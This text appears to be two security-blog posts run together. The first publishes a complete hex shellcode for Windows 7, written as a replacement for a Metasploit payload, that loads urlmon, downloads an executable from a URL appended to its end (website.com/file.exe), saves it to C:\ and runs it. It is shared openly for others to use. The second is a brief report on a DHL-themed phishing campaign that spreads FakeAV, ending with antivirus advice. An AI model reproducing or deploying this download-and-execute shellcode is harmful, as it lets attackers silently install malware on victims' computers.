Recently, I need a shellcode to download and execute an .exe file on Windows 7 for my experiment. However, there is not such a shellcode available.

Meanwhile, the download and execution shellcode generated by Metasploit Framework, currently, is unable to work on Windows 7, and the search on the Internet does not bring about desirable results.

With reference to the shellcode of “SkyLined” and some other shellcodes from milw0rm.com, I wrote a shellcode at my own discretion. And this is the result I would like to share with you:

shellcode[] =
“\xEB\x50\x31\xF6\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E”
“\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x67″
“\xE3\xEC\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99″
“\x02\x17\xC1\xCA\x04\xAE\x75\xF8\x3B\x54\x24\x04\xE0\xE4\x75\xCE”
“\x8B\x53\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C”
“\x97\xC3\x68\x8E\x48\x8B\x63\xE8\xA6\xFF\xFF\xFF\x66\xB8\x6C\x6C”
“\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD5\x68\x83″
“\x2B\x76\xF6\xE8\x8A\xFF\xFF\xFF\xEB\x21\x50\xFF\xD5\x68\xE7\xC4″
“\xCC\x69\xE8\x7B\xFF\xFF\xFF\x50\x4C\x4C\x4C\x4C\xFF\xD5\x68\x77″
“\xA6\x60\x2A\xE8\x6A\xFF\xFF\xFF\x50\xFF\xD5\x50\x68\x2E\x65\x78″
“\x65\x68\x43\x3A\x5C\x78\x50\x50\x89\xE3\x80\xC3\x08\x53\xE8\xC7″
“\xFF\xFF\xFFhttp://website.com/file.exe”;

As can be seen, the URL is placed at the end of the shellcode.

Download ASM source code

The shellcode was successfully experimented on Windows 7, and perhaps it can also work on Windows 2000 and later versions.

Le Manh Tung
Senior Security Researcher

Recently, our Honeypot system has detected a new campaign in which bad guys use bogus customer care emails of DHL, a world-famous express company, to spread FakeAV.

Content of the fake email

Still taking advantage of users’ curiosity and “greed”, hackers have sent out emails with attractive content to induce users to open the attached file. Once the file is opened, they have unconsciously “broken open the door” for FakeAV to infect their computer.

Upon infection, FakeAV “threatens” users with fake notifications

The virus (named W32.FakeDHL.Worm by Bkav) downloads FakeAV from a server located in Russia – where the use of computer virus to earn money is raging intensely:

Address to download FakeAV

Ransomware and FakeAV are known as the best at “making money” in malware’s world,  New variants are continually generated as well as upgraded  with new ways to spread. Therefore, while waiting for authorities to build up laws and take specific actions against these phishing forms, you are recommended to actively protect your own computer. Besides being vigilant towards attached files in emails, it’s advisable that you equip your computer with a licensed antivirus program to get regular updates and timely support from experts. Do not try to economize on the amount spent for a licensed software and then lose a much bigger sum of money for bad guys.

Pham Tuan Vu

Malware Researcher